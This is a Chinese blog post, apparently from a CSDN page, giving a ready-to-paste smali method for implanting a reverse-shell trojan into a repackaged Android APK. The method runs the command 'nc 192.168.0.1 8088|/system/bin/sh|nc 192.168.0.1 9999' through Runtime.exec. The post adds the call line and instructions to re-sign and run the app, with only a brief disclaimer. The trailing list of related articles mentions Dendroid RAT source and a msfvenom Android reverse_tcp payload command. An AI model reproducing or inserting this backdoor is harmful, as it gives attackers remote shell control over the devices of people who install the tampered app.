安卓木马demo_向安卓APK smali源码中植入木马

最新推荐文章于 2024-12-15 20:00:00 发布
原创 最新推荐文章于 2024-12-15 20:00:00 发布 · 2.4k 阅读 · 4 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安卓木马demo

这篇博客提供了一个在安卓APK的SMALI源码中植入反弹SHELL木马的DEMO,详细解释了如何将恶意代码插入到函数中,并展示了调用该函数的代码。作者提醒读者此技术仅用于测试,不得用于非法目的。需要注意的是,实际应用中需要根据目标应用的包名和类名进行适当修改,并且设备上需要安装相应工具才能运行。

向安卓APK smali源码中植入木马反弹SHELL的测试代码【请勿用于非法目的,切记!】

在安卓应用程序中植入木马已经不是什么新鲜事情,下面给出一个demo 反弹shell的一个smali源码,可以直接插入到目标应用的smali源码中,其中第一部分为函数体。注意修改其中的.line 行号。建议插入到一个smali文件的末尾,这样行号只要顺着原smali文件的行号增大即可。

然后使用第二部分的源码进行调用。

# virtual methods

.method public getshell()V

.registers 8

.prologue

.line 28

invoke-static {}, Ljava/lang/Runtime;->getRuntime()Ljava/lang/Runtime;

move-result-object v1

.line 31

.local v1, rt:Ljava/lang/Runtime;

:try_start_4

sget-object v2, Ljava/lang/System;->out:Ljava/io/PrintStream;

const-string v3, “NC IS OK!!!!”

invoke-virtual {v2, v3}, Ljava/io/PrintStream;->println(Ljava/lang/String;)V

.line 34

sget-object v2, Ljava/lang/System;->out:Ljava/io/PrintStream;

invoke-static {}, Ljava/lang/Runtime;->getRuntime()Ljava/lang/Runtime;

move-result-object v3

const/4 v4, 0×3

new-array v4, v4, [Ljava/lang/String;

const/4 v5, 0×0

const-string v6, “/system/bin/sh”

aput-object v6, v4, v5

const/4 v5, 0×1

const-string v6, “-c”

aput-object v6, v4, v5

const/4 v5, 0×2

const-string v6, “nc 192.168.0.1 8088|/system/bin/sh|nc 192.168.0.1 9999″

aput-object v6, v4, v5

invoke-virtual {v3, v4}, Ljava/lang/Runtime;->exec([Ljava/lang/String;)Ljava/lang/Process;

move-result-object v3

invoke-virtual {v2, v3}, Ljava/io/PrintStream;->println(Ljava/lang/Object;)V

:try_end_2a

.catch Ljava/io/IOException; {:try_start_4 .. :try_end_2a} :catch_2b

.line 41

:goto_2a

return-void

.line 37

:catch_2b

move-exception v0

.line 39

.local v0, e:Ljava/io/IOException;

invoke-virtual {v0}, Ljava/io/IOException;->printStackTrace()V

goto :goto_2a

.end method

此处为调用代码,注入插入到一个smali源码程序后就要修改下面的Lcom/example/test/MainActivity为响应的包名和类名,可以参考当前被修改的smali文件上下文进行修改,修改成功后保存并重新打包签名,然后在手机上运行即可。

1

invoke-virtual {p0}, Lcom/example/test/MainActivity;->getshell()V

这个程序会在控制台logcat显示NC IS OK!!的信息方便调试。注意设备需要有装过NC,不过这里有个悖论诶,没有root的设备很少有自带NC的,而root后的设备有很多不装busybox的,也没有NC。所以呢。。具体可用价值,大家自己衡量吧~~

反编译简单分析metasploit生成的安卓木马
Aiwin的博客
02-06 1640
apk反编译简单分析metasploit的安卓木马
Dendroid源码
08-05
知名安卓远程控制Dendroid源代码 控制端网页搭建的,源码方便学习哈哈
android旋转木马滑动效果源码
08-14
android图片旋转木马效果,没有加密,直接解压
igniter:Android的木马客户端(UNDER CONSTRUCTION)
04-01
点火器 Android的木马客户端。 谢谢 Dreamacro /冲突 bingoogolapple / BGAQRCode-Android 聚苯乙烯 已从迁移到进行QR码扫描。
关于黑客在APK文件中植入木马的相关讲解
kyrin(云中鹤)
08-05 8800
最近,成功在一些市场上的apk文件中植入自己的短信侦听的代码(非恶意,反对通过此手段做一些不好的事情)比如:神庙逃亡2,fruit monkey等游戏(目测基本上所有游戏都可以植入)      其实吧,在apk植入自己的代码也不是很难,只需要网上一些普通的反编译工具比如:apktool,再加上自己的头脑,就可以了!!一个apk文件反编译成的samli格式的文件,很难对它做修改,因为基本上看不懂
我的MSF之Android木马渗透的学习笔记
yuan_boss的博客
06-07 6469
使用kali制作Android木马并进行通讯录渗透的学习笔记
精选资源
android安卓app反编译apk反编译教程.zip_android反编译smali
01-12
本教程将围绕"android安卓app反编译apk反编译教程"这一主题,详细讲解如何进行APK反编译,以及涉及到的相关知识点。 首先,我们要理解什么是APK反编译。APK是Android应用的安装包,包含了应用的所有资源、代码和元...
精选资源
android安卓app开发之用AndroidStudio反编译apk.zip_android反编译smali
01-17
android安卓app开发之用AndroidStudio反编译apk.zip
app.zip_Pokemon_main_smali _zip
09-23
在Android应用开发中,Smali是一种汇编语言,用于反编译和重建APK文件中的Dalvik字节码。标题"app.zip_Pokemon_main_smali _zip"暗示了我们正在探讨的是一个与宝可梦相关的应用程序,其主要活动(activities)的源...
Android_Anti-compiler-tool-.rar_Android逆向_android_安卓反编译_安卓逆向_辅助
09-24
本资源“Android_Anti-compiler-tool-.rar”提供了一套针对Android应用的逆向工具,对理解和改进Android应用的内部逻辑大有裨益。 首先,我们要理解什么是Android逆向。逆向工程是将已编译的代码还原为源代码的过程...
精选资源
安卓apk没有源码怎么更换包名以及修改源码内容(反编译+源码修改+重新打包+签名)
09-25
在没有源码的情况下对Android APK进行包名更换以及修改源码内容,是一个涉及反编译、代码修改、重新打包和签名的复杂过程。这一过程不仅要求对Android应用结构有所了解,而且还需要掌握一定的反编译工具使用技巧和...
Dendroid全套源码
10-31
Dendroid全套源码,包括客户端和控制端,属于安卓远控类程序,一般杀毒软件都会报毒,仅供学习研究,勿用于其它非法用途! 再次声明:仅供学习研究,勿用于其它非法用途! 解压密码:123456
Android 下 APK 捆绑器的实现
热门推荐
tiandyoin的专栏
04-08 1万+
Android 下 APK 捆绑器的实现                    作者: 海东青 利用捆绑器向正常程序捆绑病毒、木马等恶意程序,以达到隐蔽安装、运行的目的,这 在 Windows 平台下是一种很常规的攻击手段。那么,在智能终端十分流行的今天,如何实 现针对手机应用的捆绑器呢?对此,本文针对 Android 平台的应用程序 APK 文件,给出了 类似 Windows 下捆绑器
安卓木马demo_前端demo(2)_旋转木马
weixin_39949889的博客
02-12 89
3D旋转*{padding: 0;margin: 0;}body,html{height:100%;}body{background-image: url("images/8.jpg");background-size: 100% 100%;}#box{width: 280px;height: 400px;position: fixed;left: 0;right: 0;top:0;bottom:...
Android银行木马源代码泄露,新变种出现!
weixin_34335458的博客
09-26 395
本文讲的是Android银行木马源代码泄露,新变种出现!,来自安全公司Dr.Web的研究人员说,最近一个未命名的Android银行木马源代码在地下黑客论坛遭到了泄露。 一般情况下,Android的银行木马通常会被卖到数千美元,或者出租用于类似的高收费。Dr.Web研究人员警告说,由于该木马的源代码非常容易获得,所以可能导致针对Android设备的银行木...
安卓木马demo_小demo 旋转木马
weixin_42358261的博客
02-12 204
翻转导航body {/*添加透视*/perspective: 1000px;}/*最外面的盒子*/section {position: relative;width: 300px;height: 200px;background: url(img/pig.jpg);margin: 200px auto;transform-style: preserve-3d;/*给子元素开启三维环境 重点代码*/...
什么是APK木马
最新发布
Kalds157551973的博客
12-15 925
这种木马程序通常伪装成合法或无害的应用程序,一旦用户下载和安装,它可以执行一系列恶意活动,如窃取敏感信息、监控用户活动、远程控制设备等。仅从官方渠道下载应用:尽量通过Google Play Store下载应用,避免使用不明来源的APK文件。一种复杂的木马,能够在Android设备上安装其他恶意软件,并通过劫持系统服务实现远程控制。一种针对Android设备的木马,能够窃取敏感信息、捕获用户输入,并且能够进行远程控制。使用安全软件:安装可信赖的安全软件,定期扫描设备,检测潜在的恶意软件。
手机android.sys木马,使用kali生成木马入侵安卓手机
weixin_42353186的博客
05-29 7936
大家好,我是T0reAd今天给大家带来的是使用kali生成行动开始先查看kali的ip,我的是1.114然后输入命令:msfvenom -p android/meterpreter/reverse_tcp LHOST=你kali的ip LPORT=5555 R > /root/apk.apk5555是设置的端口,可以自己更改显示这个说明已经生成成功了然后启动msf:msfconsol...
小白尝试——在自己的apk中添加马子
qq_44918093的博客
05-15 2663
起因 昨天写了个hello world apk,今天突然想,能不能在里边注入小马子玩玩,说干就干,不务正业的我又开始啦 工具 kali(我装在VM里) apktool Java环境 开始 先生成个木马,输入 msfvenom -p android/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx(你的kali的IP地址) LPORT=5555 R>/root/m.apk(也有可能由于没有安装msf而进入失败,输入这个命令安装就好apt install metasplo
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值